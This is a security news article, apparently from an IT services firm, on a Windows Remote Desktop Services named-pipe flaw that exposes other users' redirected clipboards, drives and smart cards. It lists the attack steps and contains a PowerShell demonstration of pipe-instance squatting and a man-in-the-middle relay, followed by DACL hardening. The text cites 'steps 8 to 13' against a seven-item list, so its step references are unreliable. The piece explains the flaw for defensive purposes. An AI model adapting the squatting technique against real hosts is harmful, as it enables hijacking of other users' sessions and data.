A vulnerability in Windows Remote Desktop Services (RDS), the server side of the Remote Desktop Protocol (RDP), could allow any standard, unprivileged user with a session on a host to reach the redirected devices of other users connected to the same host. Researchers have warned that exploitation could lead to data-privacy issues, lateral movement and privilege escalation.
An attacker who already holds a session on the host could view and modify other people’s clipboard data, read their redirected drives, or impersonate other logged-in users by using their redirected smart cards. The flaw is present at least as far back as Windows Server 2012 R2, and the researchers concluded that current client and server editions of Windows are affected as well.
Some background on RDP plumbing: RDP splits a single connection into multiple logical connections called virtual channels, each carrying a different type of data. Some channels provide the core functionality of RDP, such as graphical and input data, while others carry protocol extensions such as clipboard, drive and printer redirection.
The vulnerability involves the attack surface presented by named pipes, a common method for interprocess communication in Windows that works in a client/server model. Both sides refer to the pipe by name, in the form “\\.\pipe\<name>” for a pipe on the local machine or “\\<hostname>\pipe\<name>” for one on a remote host. Once the connection is established, client and server exchange data with the ordinary WriteFile and ReadFile functions.
It’s common to have one server process that handles multiple clients by creating multiple pipe server instances, meaning that the server process will call CreateNamedPipe multiple times with the same pipe name. Researchers said: “Each time it will get a new server instance. When a client connects to a named pipe server, it connects to one instance. If there are multiple instances available, the client will connect to the one that was created first [FIFO, or first-in, first-out ordering].”
Each call to CreateNamedPipe is independent, and the name alone says nothing about who created a given instance: any process that the pipe’s security descriptor allows to create new instances can add its own server instance under the same name, and a caller that connects by name alone may end up talking to it. Researchers outlined how simple the attack is:
- An attacker connects to a remote machine via RDP
- The attacker lists the open named pipes and finds the full name of the TSVCPIPE pipe
- The attacker creates a pipe server instance with the same name and waits for a new connection
- Once a new connection arrives, RDS creates its own pipe server instance for the session and a pipe client that will attempt to connect to it
- Because of the FIFO ordering, the pipe client connects to the attacker’s pipe server instance instead of the one created by the RDS service
- The attacker connects as a client to the real RDS pipe server instance
- The attacker holds both ends of the connection; they can act as man-in-the-middle (MitM), passing the data back and forth, viewing and (optionally) modifying it
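To make the mechanic behind steps 8 to 13 concrete, here is an added PowerShell example. It is not the researchers’ proof of concept and not code from the page: it reproduces the instance-squatting and relay on a throwaway pipe name of its own (an invented name, not TSVCPIPE), with the “attacker” and “service” roles played by the same process, and then shows the kind of pipe DACL that stops other users from adding instances. It assumes Windows PowerShell 5.1 (.NET Framework) on Windows; the sample message is constructed.

```powershell
# Added example (not the researchers' PoC): named-pipe instance squatting, FIFO
# selection, MitM relay, and a restrictive DACL. Assumes Windows PowerShell 5.1.
$ErrorActionPreference = 'Stop'
$pipeName = 'demo-squat-' + [guid]::NewGuid().ToString('N')   # invented name, not TSVCPIPE
$dir     = [System.IO.Pipes.PipeDirection]::InOut
$maxInst = [System.IO.Pipes.NamedPipeServerStream]::MaxAllowedServerInstances
$mode    = [System.IO.Pipes.PipeTransmissionMode]::Byte
$async   = [System.IO.Pipes.PipeOptions]::Asynchronous   # needed for BeginWaitForConnection

# Step 8: enumerate open pipes. On an RDS host the real target shows up as
# \\.\pipe\TSVCPIPE-<guid>; here we only report whether such a name is present.
$tsv = [System.IO.Directory]::GetFiles('\\.\pipe\') | Where-Object { $_ -like '*TSVCPIPE*' }
"TSVCPIPE instances visible: $(@($tsv).Count)"

# Step 9: the "attacker" creates a server instance of the name first and waits.
$attacker = New-Object System.IO.Pipes.NamedPipeServerStream($pipeName, $dir, $maxInst, $mode, $async)
$attackerWait = $attacker.BeginWaitForConnection($null, $null)

# Step 10: the "service" creates its own instance of the same name afterwards and waits.
$service = New-Object System.IO.Pipes.NamedPipeServerStream($pipeName, $dir, $maxInst, $mode, $async)
$serviceWait = $service.BeginWaitForConnection($null, $null)

# Step 11: the service's own pipe client connects by name only and lands on the
# oldest listening instance, i.e. the attacker's.
$serviceClient = New-Object System.IO.Pipes.NamedPipeClientStream('.', $pipeName, $dir)
$serviceClient.Connect(5000)
if (-not $attackerWait.AsyncWaitHandle.WaitOne(5000)) { throw 'attacker instance did not receive the connection' }
$attacker.EndWaitForConnection($attackerWait)
'service client connected to the attacker instance (FIFO)'

# Step 12: the attacker connects as a client; the only instance still listening
# is the real service's, so that is where it lands.
$attackerClient = New-Object System.IO.Pipes.NamedPipeClientStream('.', $pipeName, $dir)
$attackerClient.Connect(5000)
$service.EndWaitForConnection($serviceWait)

# Step 13: relay one message through the attacker, who sees it in the clear
# and could alter it before forwarding.
$request = [System.Text.Encoding]::ASCII.GetBytes('constructed sample: redirected smart-card request')
$serviceClient.Write($request, 0, $request.Length); $serviceClient.Flush()
$buf = New-Object byte[] 256
$n = $attacker.Read($buf, 0, $buf.Length)
'attacker observed: ' + [System.Text.Encoding]::ASCII.GetString($buf, 0, $n)
$attackerClient.Write($buf, 0, $n); $attackerClient.Flush()   # forward unchanged (tampering point)
$n2 = $service.Read($buf, 0, $buf.Length)
'service received:  ' + [System.Text.Encoding]::ASCII.GetString($buf, 0, $n2)
$attacker, $service, $serviceClient, $attackerClient | ForEach-Object { $_.Dispose() }

# Hardening: the DACL on the first instance governs who may create further
# instances of the name. Keep CreateNewInstance for the service's own identity
# and give everyone else ReadWrite only (which does not include CreateNewInstance),
# so CreateNamedPipe on this name fails with access denied for a squatter running
# as a different user.
$me       = [System.Security.Principal.WindowsIdentity]::GetCurrent().User
$everyone = New-Object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::WorldSid, $null)
$sec = New-Object System.IO.Pipes.PipeSecurity
$sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule($me, [System.IO.Pipes.PipeAccessRights]::FullControl, 'Allow')))
$sec.AddAccessRule((New-Object System.IO.Pipes.PipeAccessRule($everyone, [System.IO.Pipes.PipeAccessRights]::ReadWrite, 'Allow')))
$hardenedName = 'demo-hardened-' + [guid]::NewGuid().ToString('N')   # invented name
$hardened = New-Object System.IO.Pipes.NamedPipeServerStream($hardenedName, $dir, $maxInst, $mode, $async, 4096, 4096, $sec)
$hardened.GetAccessControl().GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier]) |
    Select-Object IdentityReference, PipeAccessRights, AccessControlType
$hardened.Dispose()
```

Two caveats a practitioner should keep in mind. The DACL only helps if the legitimate service creates the first instance: a squatter that gets there first owns the descriptor, so a service that wants to notice a pre-existing instance should also pass the Win32 flag FILE_FLAG_FIRST_PIPE_INSTANCE to CreateNamedPipe (which makes the call fail if the name already exists; .NET Framework’s NamedPipeServerStream does not expose that flag, which is why the example shows only the DACL). And the run above never actually tests the denial, because both roles run as the same user; to see the access-denied path, run the squatting half from a session under a second, non-administrative account against the hardened pipe’s name.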
Attacks on RDP are very common, but this vulnerability adds a twist. The researchers called it “An example of an unconventional attack vector targeting RDP. Instead of tapping into the input side of the server/client as one usually does, we abused the RDP server internal mechanism as an entry point.” While the researchers chose to focus on drive and smart-card redirection, they said they believe the same technique would work with other types of devices, protocols and channels, such as printers, audio, USB devices and authentication redirection.
They’re “strongly” recommending applying the patch Microsoft issued on Tuesday (25th Jan 2022), given that “almost all Windows versions are affected.” They also suggested that developers of applications that use custom virtual channels “should check whether they are vulnerable and conduct their own security assessment.”
Last July, researchers took a look at the complexities of setting up RDP for remote work. They noted that the protocol itself “is not a secure setup” and therefore requires “additional security measures to keep workstations and servers protected.” Without proper security protocols, “organisations face several potential risks, including the increased risk of cyber attacks.”
RDP attacks typically target small businesses, which often lack the resources to protect against and respond to them. Cyber criminals go after RDP for a number of reasons; the most common objectives include distributed denial of service (DDoS) attacks and ransomware delivery.
Cyber criminals have noted the increased use of RDP, as remote working has surged. Between Q1 and Q4 2020, attacks against RDP surged by 768%, while an October 2020 report identified that 47% of ransomware attacks were preceded by RDP compromise. Researchers said: “While RDP is required for normal system maintenance, it can’t be left to run on its own. Additional defences like establishing a zero-trust framework and having an automated method of quickly implementing firmware fixes are needed to ensure RDP is used safely.”
Neuways have plenty of alternatives to RDP for businesses to take advantage of. Microsoft Office 365 removes the need for RDP, as the shared Microsoft ecosystem provides an easy-to-use shared platform on which businesses can interact and work collaboratively.